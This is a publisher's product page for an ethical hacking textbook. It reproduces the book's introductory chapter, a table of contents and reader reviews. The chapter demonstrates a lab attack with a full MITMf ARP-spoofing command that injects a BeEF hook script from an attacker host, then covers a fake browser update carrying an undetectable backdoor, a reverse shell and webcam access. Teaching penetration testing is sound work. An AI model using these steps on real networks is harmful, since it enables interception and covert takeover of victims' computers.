Search icon CANCEL
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Conferences
Free Learning
Arrow right icon
Learn Ethical Hacking from Scratch
Learn Ethical Hacking from Scratch

Learn Ethical Hacking from Scratch: Your stepping stone to penetration testing

eBook
$27.98 $39.99
Paperback
$48.99
Subscription
Free Trial
Renews at $19.99p/m

What do you get with eBook?

Product feature icon Instant access to your Digital eBook purchase
Product feature icon Download this book in EPUB and PDF formats
Product feature icon Access this title in our online reader with advanced features
Product feature icon DRM FREE - Read whenever, wherever and however you want
Table of content icon View table of contents Preview book icon Preview Book

Learn Ethical Hacking from Scratch

Introduction

Primarily, this chapter will provide a brief overview of the topics that will be covered throughout this book. It will cover all of the aspects associated with hacking, from how to perform hacking to protecting your system from being hacked. Later in the chapter, we will discuss the concept of hacking, discussing three types of hackers: white hat hackers, black hat hackers, and grey hat hackers. Toward the end of the chapter, we will illustrate some real-time hacking applications.

This chapter will address the following questions:

  • What's in this book?
  • What is hacking?
  • Why should we learn about hacking?
  • A glimpse of hacking

What's in this book?

In this book, you will learn how to become an ethical hacker from scratch. We'll assume that you have no experience in ethical hacking, and, by the end of the book, you will be at an intermediate (to high) level.

Here is a quick overview of what will be covered in this book:

  • Preparation
  • Penetration testing
  • Protecting your own system

Preparation

In the first part of this book, you will learn how to create your own lab, so that you can practice ethical hacking on your own computer. You will also learn the installation of Linux systems and how to interact with them, as well as how to set up other systems to try to hack into them.

Penetration testing

In this part of the book, we will cover the most important penetration testing fields. In each of these sections, we will first illustrate how a particular system works, and will then test the security of that system. In the following sections, we will introduce the types of penetration testing that will be seen in this book.

Network penetration testing

In network penetration testing, the first things that we will learn are how networks work and how devices interact with each other.

First, we will learn more about the networks around us; we will gradually proceed by setting up a fake access point and luring people into connecting to networks so that we can capture data that is sent or received through them. We will then learn how to get the password for any Wi-Fi network, whether it uses WEP, WPA, or WPA2 encryption.

We will also go over a large number of powerful attacks that will allow us to gain access to any account that is accessed from any computer in a network. We will be able to capture usernames, passwords, images, and pictures that computers on a network send or receive.

Gaining access

In this part of the chapter, we will learn how to gain access to computer systems. There are two methods to hack a computer:

  • Server-side attacks
  • Client-side attacks

When learning about server-side attacks, you will see how to discover weaknesses in the programs installed on the target computer, and how to use those weaknesses to gain full access to the computer.

In the client-side attacks, you're going to learn how to use social engineering to hack into the target, you'll learn how to create undetectable backdoors, backdoors that look like images and pictures, and so on. We will also learn how to gain access to any computer if that computer exists in our network by using fake updates or by using fake downloads.

Post exploitation

In this section, we look at post exploitation, learning how to control the devices that we hacked. So, we're going to see how to open a system's webcam, manage its filesystems, and download or upload files to it. We will also learn how to capture all of the key strikes that the person enters on their keyboard, or even use that computer as a pivot to hack into other computers.

Website penetration testing

In the final sections, which will be about website penetration testing, we will learn how to gather very comprehensive information about websites, including how to discover, exploit, and mitigate a large number of serious vulnerabilities.

Protecting your system

Finally, we will learn how to protect ourselves (and our systems) from the attacks discussed in the preceding sections.

What is hacking?

Through hacking, you can do anything that you're not supposed to do (or allowed to do). For example, you can view information that you don't have permission to see or use a computer that you're not allowed to use. There are many different types of hacking, such as email hacking, computer hacking, server hacking, and web application hacking.

There are three different types of hackers:

  • Black hat hackers: Black hat hackers hack into systems for their own benefit; these are the ones that steal money or break systems purely to benefit themselves.
  • White hat hackers: White hat hackers try to secure systems; they might use the same methods as black hat hackers, but they only do it on systems for which they have permission to do so, in order to see if the systems are vulnerable—they hack them in order to fix them.
  • Grey hat hackers: There are also grey hat hackers, which are a mix of both; they will test any systems that they want to test, even if they don't have permission to hack them. Once they do hack into things, they don't break anything or steal any money; they don't cause damage. They might even tell the administrators how to fix it.

In this book, we will be white hat hackers. This book is only about teaching hacking for educational purposes. It is for people who want to be able to secure their networks, and who want to work as pen testers to secure computer systems.

Why should we learn about hacking?

Hacking is an existing field—there are many job opportunities within it, it is happening every day, and it involves a growing demand for protection. We all heard about the Sony hack when PlayStation was down for a considerable amount of time. Companies such as Sony are actually hiring people to try to hack into them. You're going to learn how to hack into networks and systems so that you can secure them from black hat hackers.

Not so long ago, someone found a way to brute-force the restore password key for Facebook on its mobile website, because Facebook didn't check for the number of times that you entered the incorrect PIN. Once the person had done this, they told Facebook about it, and they were rewarded with $20,000, because Facebook has a bug bounty program. At the moment, many websites and companies have bug bounties – they are asking people to try to hack them, and they will pay a certain amount of money if a hack is successful, depending on how dangerous the exploit is.

A glimpse of hacking

In the coming sections, we are going to learn how to install the operating systems and programs needed for hacking. We will then learn some basics about hacking, and how to use the operating systems involved. Before we start, I'd like to give you the gist of what you're going to be able to do by the end of this book. In this section, we are going to go through an example of hacking a Windows computer from a Linux machine.

Don't worry about how we installed these machines or how to run these commands; right now, this is just an example. In the future, we're going to break this into steps, and you will see exactly how to run the attack. You will also learn about how the attack works, and how to protect yourself from such an attack.

Browser exploitation framework

Now, we are going to use a program called Browser Exploitation Framework (BeEF):

  1. We're going to launch BeEF XSS Framework. It uses JavaScript code to hook a target computer; once a computer is hooked, we'll be able to run a number of commands. Following is a screenshot of how it looks:
  1. To run the commands, we will use a man-in-the-middle attack to automatically inject the hook code for BeEF. We will use a tool called MITMf to perform an ARP spoofing attack. We will give it the network interface, gateway, and target IP address, which is the address of the Windows machine.
  2. Next, we will tell MITMf that we want it to inject a JavaScript URL, and give it the location where the hook is stored. The code will look something like this:
mitmf --arp --spoof -i eth0 --gateway 10.0.2.1 --target 10.0.2.5 --inject --js-url http://10.0.2.15:3000/hook.js
  1. Once this is done, hit Enter, and it will run successfully. Its output is shown here:
  1. This looks very complicated; we don't know where we got the options from, so it probably all looks very confusing in the preceding screenshot. Again, don't worry; we will discuss it in detail later on, and it will become easy for you. Right now, all we need to understand is that this program is going to inject the hook code; the code allows BeEF to hack into the computer, into the browser used by the target person, and the code can run without the person even knowing.
  1. Now, go to the Windows machine and run the web browser. We're just going to go to any website, such as Google or Bing.
  2. If you go back to the Kali machine, you'll see that we have the IP address of the target person under Hooked Browsers, and, if you click on the Commands tab, you'll see a large number of categories, with commands that you can run on the target computer. These are shown in the following screenshot:
  1. Let's display a fake notification bar to the target telling them there's a new update, so click on Social Engineering | Fake Notification Bar (Firefox), as shown in the following screenshot:
  1. This is going to show the target person that there's a new update, and, once they have installed the update, we can hack into their computer. Now, let's configure the fake notification bar to install a backdoor once the user clicks on it.
  2. We have a ready-made backdoor that's not detectable by antivirus programs (you will see how to do that in upcoming chapters). We will store that backdoor, and call it update.exe.
  1. Next, we will click on Execute. Now, before we run the update, we will have to listen to incoming connections to connect to the target computer, once the victim tries to update their computers. Now, if we hit Execute on the fake notification bar command, the bar will be displayed in the target's browser, as shown in the following screenshot:
  1. In the preceding screenshot, Firefox is showing that there is a critical update, and you need to click on Install plug-in to install that update. Once you have clicked on it, and you can see that it has downloaded an update file, save it, and then run the update.
  2. If we go back to the Kali machine, we'll see that we managed to get a reverse session from the Windows machine. So, let's interact with that computer; we will basically have full control over it:

Now, let's see how to access the target computer's webcam.

Accessing the target computer's webcam

To access the webcam, we are going to use a plugin that comes with Meterpreter; we will use the webcam_stream command.

When we hit Enter, we will be able to turn the webcam on. It is a webcam that's actually attached to the Windows machine; we have hacked into the Windows machine, and we can do anything we want on it. Again, this is just an example of one attack that we're going to use. We're going to perform many more attacks like this, and all of them are going to allow us to gain full control over the target system.

Summary

In this chapter, we looked at some brief descriptions of the topics that will be thoroughly covered in this book. We discussed using a Linux machine to hack a computer with the Windows operating system. Then, we learned about the concept of hacking through the use of real-time examples. The different types of hackers were discussed. Finally, we saw various applications involved in hacking.

In the following chapter, we will set up a virtual environment to perform various penetration tests. We will also install Kali Linux, Windows, and Metaspoitable machines.

Left arrow icon Right arrow icon
Download code icon Download Code

Key benefits

  • Understand how computer systems work and their vulnerabilities
  • Exploit weaknesses and hack into machines to test their security
  • Learn how to secure systems from hackers

Description

This book starts with the basics of ethical hacking, how to practice hacking safely and legally, and how to install and interact with Kali Linux and the Linux terminal. You will explore network hacking, where you will see how to test the security of wired and wireless networks. You’ll also learn how to crack the password for any Wi-Fi network (whether it uses WEP, WPA, or WPA2) and spy on the connected devices. Moving on, you will discover how to gain access to remote computer systems using client-side and server-side attacks. You will also get the hang of post-exploitation techniques, including remotely controlling and interacting with the systems that you compromised. Towards the end of the book, you will be able to pick up web application hacking techniques. You'll see how to discover, exploit, and prevent a number of website vulnerabilities, such as XSS and SQL injections. The attacks covered are practical techniques that work against real systems and are purely for educational purposes. At the end of each section, you will learn how to detect, prevent, and secure systems from these attacks.

Who is this book for?

Learning Ethical Hacking from Scratch is for anyone interested in learning how to hack and test the security of systems like professional hackers and security experts.

What you will learn

  • Understand ethical hacking and the different fields and types of hackers
  • Set up a penetration testing lab to practice safe and legal hacking
  • Explore Linux basics, commands, and how to interact with the terminal
  • Access password-protected networks and spy on connected clients
  • Use server and client-side attacks to hack and control remote computers
  • Control a hacked system remotely and use it to hack other systems
  • Discover, exploit, and prevent a number of web application vulnerabilities such as
  • XSS and SQL injections

Product Details

Country selected
Publication date, Length, Edition, Language, ISBN-13
Publication date : Jul 31, 2018
Length: 564 pages
Edition : 1st
Language : English
ISBN-13 : 9781788624787
Vendor :
Offensive Security
Category :
Concepts :
Tools :

What do you get with eBook?

Product feature icon Instant access to your Digital eBook purchase
Product feature icon Download this book in EPUB and PDF formats
Product feature icon Access this title in our online reader with advanced features
Product feature icon DRM FREE - Read whenever, wherever and however you want

Product Details

Publication date : Jul 31, 2018
Length: 564 pages
Edition : 1st
Language : English
ISBN-13 : 9781788624787
Vendor :
Offensive Security
Category :
Concepts :
Tools :

Packt Subscriptions

See our plans and pricing
Modal Close icon
$19.99 billed monthly
Feature tick icon Unlimited access to Packt's library of 7,000+ practical books and videos
Feature tick icon Constantly refreshed with 50+ new titles a month
Feature tick icon Exclusive Early access to books as they're written
Feature tick icon Solve problems while you work with advanced search and reference features
Feature tick icon Offline reading on the mobile app
Feature tick icon Simple pricing, no contract
$199.99 billed annually
Feature tick icon Unlimited access to Packt's library of 7,000+ practical books and videos
Feature tick icon Constantly refreshed with 50+ new titles a month
Feature tick icon Exclusive Early access to books as they're written
Feature tick icon Solve problems while you work with advanced search and reference features
Feature tick icon Offline reading on the mobile app
Feature tick icon Choose a DRM-free eBook or Video every month to keep
Feature tick icon PLUS own as many other DRM-free eBooks or Videos as you like for just $5 each
Feature tick icon Exclusive print discounts
$279.99 billed in 18 months
Feature tick icon Unlimited access to Packt's library of 7,000+ practical books and videos
Feature tick icon Constantly refreshed with 50+ new titles a month
Feature tick icon Exclusive Early access to books as they're written
Feature tick icon Solve problems while you work with advanced search and reference features
Feature tick icon Offline reading on the mobile app
Feature tick icon Choose a DRM-free eBook or Video every month to keep
Feature tick icon PLUS own as many other DRM-free eBooks or Videos as you like for just $5 each
Feature tick icon Exclusive print discounts

Frequently bought together


Stars icon
Total $ 158.97
Kali Linux 2018: Windows Penetration Testing
$54.99
Learn Ethical Hacking from Scratch
$48.99
Learning Malware Analysis
$54.99
Total $ 158.97 Stars icon

Table of Contents

23 Chapters
Introduction Chevron down icon Chevron up icon
Setting Up a Lab Chevron down icon Chevron up icon
Linux Basics Chevron down icon Chevron up icon
Network Penetration Testing Chevron down icon Chevron up icon
Pre-Connection Attacks Chevron down icon Chevron up icon
Network Penetration Testing - Gaining Access Chevron down icon Chevron up icon
Post-Connection Attacks Chevron down icon Chevron up icon
Man-in-the-Middle Attacks Chevron down icon Chevron up icon
Network Penetration Testing, Detection, and Security Chevron down icon Chevron up icon
Gaining Access to Computer Devices Chevron down icon Chevron up icon
Scanning Vulnerabilities Using Tools Chevron down icon Chevron up icon
Client-Side Attacks Chevron down icon Chevron up icon
Client-Side Attacks - Social Engineering Chevron down icon Chevron up icon
Attack and Detect Trojans with BeEF Chevron down icon Chevron up icon
Attacks Outside the Local Network Chevron down icon Chevron up icon
Post Exploitation Chevron down icon Chevron up icon
Website Penetration Testing Chevron down icon Chevron up icon
Website Pentesting - Information Gathering Chevron down icon Chevron up icon
File Upload, Code Execution, and File Inclusion Vulnerabilities Chevron down icon Chevron up icon
SQL Injection Vulnerabilities Chevron down icon Chevron up icon
Cross-Site Scripting Vulnerabilities Chevron down icon Chevron up icon
Discovering Vulnerabilities Automatically Using OWASP ZAP Chevron down icon Chevron up icon
Other Books You May Enjoy Chevron down icon Chevron up icon

Customer reviews

Top Reviews
Rating distribution
Full star icon Full star icon Full star icon Full star icon Half star icon 4.4
(17 Ratings)
5 star 76.5%
4 star 5.9%
3 star 5.9%
2 star 5.9%
1 star 5.9%
Filter icon Filter
Top Reviews

Filter reviews by




sankith Dec 29, 2023
Full star icon Full star icon Full star icon Full star icon Full star icon 5
It book is good because full clear about Ethical hacking book
Subscriber review Packt
DeeGX2 Sep 16, 2018
Full star icon Full star icon Full star icon Full star icon Full star icon 5
In the same vein of Georgia Weidman book at beginning pentesting....this is THE book to start with hands down.It is the most current and the instruction found in the book is extremely easy to follow.Unfortunately, much of the material in her (Wiedmans) book is outdated, but Zaids book has that covered!The complex issues are broken down in to portions that are digestible and they build on each other.The author also has a Udemy video course of the same name that seems to follow the subject matter in the book.He is very responsive and you also find it easy to follow the examples that he provides.I cannot stress enough how good the author is at conveying ideas to beginners to give them a VERY good basis for entering the pentesting/cracking (white hat) realm.This book definitely deserves a look if you are heading into this realm of cybersecurity.
Amazon Verified review Amazon
John Parker Oct 16, 2020
Full star icon Full star icon Full star icon Full star icon Full star icon 5
Great book. This is by far the best I’ve read yet. The way it is explained makes it much easier to understand and remember the steps and processes to hacking. And that allowed myself more time practicing hacking in the virtual labs. This was a huge help for getting my CEH certification.
Amazon Verified review Amazon
Judi Jan 04, 2020
Full star icon Full star icon Full star icon Full star icon Full star icon 5
Excellent book
Amazon Verified review Amazon
aaa Aug 07, 2020
Full star icon Full star icon Full star icon Full star icon Full star icon 5
The book is very simple to understand and followStructure and layout is perfectIt serves the purpose of learnersThis is one of the best all time hackers collections
Amazon Verified review Amazon
Get free access to Packt library with over 7500+ books and video courses for 7 days!
Start Free Trial

FAQs

How do I buy and download an eBook? Chevron down icon Chevron up icon

Where there is an eBook version of a title available, you can buy it from the book details for that title. Add either the standalone eBook or the eBook and print book bundle to your shopping cart. Your eBook will show in your cart as a product on its own. After completing checkout and payment in the normal way, you will receive your receipt on the screen containing a link to a personalised PDF download file. This link will remain active for 30 days. You can download backup copies of the file by logging in to your account at any time.

If you already have Adobe reader installed, then clicking on the link will download and open the PDF file directly. If you don't, then save the PDF file on your machine and download the Reader to view it.

Please Note: Packt eBooks are non-returnable and non-refundable.

Packt eBook and Licensing When you buy an eBook from Packt Publishing, completing your purchase means you accept the terms of our licence agreement. Please read the full text of the agreement. In it we have tried to balance the need for the ebook to be usable for you the reader with our needs to protect the rights of us as Publishers and of our authors. In summary, the agreement says:

  • You may make copies of your eBook for your own use onto any machine
  • You may not pass copies of the eBook on to anyone else
How can I make a purchase on your website? Chevron down icon Chevron up icon

If you want to purchase a video course, eBook or Bundle (Print+eBook) please follow below steps:

  1. Register on our website using your email address and the password.
  2. Search for the title by name or ISBN using the search option.
  3. Select the title you want to purchase.
  4. Choose the format you wish to purchase the title in; if you order the Print Book, you get a free eBook copy of the same title. 
  5. Proceed with the checkout process (payment to be made using Credit Card, Debit Cart, or PayPal)
Where can I access support around an eBook? Chevron down icon Chevron up icon
  • If you experience a problem with using or installing Adobe Reader, the contact Adobe directly.
  • To view the errata for the book, see www.packtpub.com/support and view the pages for the title you have.
  • To view your account details or to download a new copy of the book go to www.packtpub.com/account
  • To contact us directly if a problem is not resolved, use www.packtpub.com/contact-us
What eBook formats do Packt support? Chevron down icon Chevron up icon

Our eBooks are currently available in a variety of formats such as PDF and ePubs. In the future, this may well change with trends and development in technology, but please note that our PDFs are not Adobe eBook Reader format, which has greater restrictions on security.

You will need to use Adobe Reader v9 or later in order to read Packt's PDF eBooks.

What are the benefits of eBooks? Chevron down icon Chevron up icon
  • You can get the information you need immediately
  • You can easily take them with you on a laptop
  • You can download them an unlimited number of times
  • You can print them out
  • They are copy-paste enabled
  • They are searchable
  • There is no password protection
  • They are lower price than print
  • They save resources and space
What is an eBook? Chevron down icon Chevron up icon

Packt eBooks are a complete electronic version of the print edition, available in PDF and ePub formats. Every piece of content down to the page numbering is the same. Because we save the costs of printing and shipping the book to you, we are able to offer eBooks at a lower cost than print editions.

When you have purchased an eBook, simply login to your account and click on the link in Your Download Area. We recommend you saving the file to your hard drive before opening it.

For optimal viewing of our eBooks, we recommend you download and install the free Adobe Reader version 9.